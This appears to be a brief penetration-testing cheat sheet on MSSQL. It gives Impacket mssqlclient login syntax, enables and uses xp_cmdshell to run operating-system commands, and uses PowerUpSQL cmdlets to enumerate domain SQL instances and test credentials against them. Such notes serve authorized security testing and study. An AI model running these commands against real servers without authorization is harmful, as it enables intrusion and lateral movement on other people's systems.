Microsoft SQL Server (MSSQL)
Linux/Unix
Impacket
# impacket-mssqlclient
mssqlclient.py <ACME.LOCAL>/<user>:"<password>"@<target> -windows-auth
enable_xp_cmdshell
xp_cmdshell whoamiWindows
PowerUpSQL
Get-SQLInstanceDomainGet-SQLInstanceDomain | Get-SQLServerInfo -Verbose$SQLInstances = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -Username "<ACME.LOCAL>\<user>" -Password "<password>" | Where-Object {$_.Status -like "Accessible"}
$SQLInstancesÚltima actualización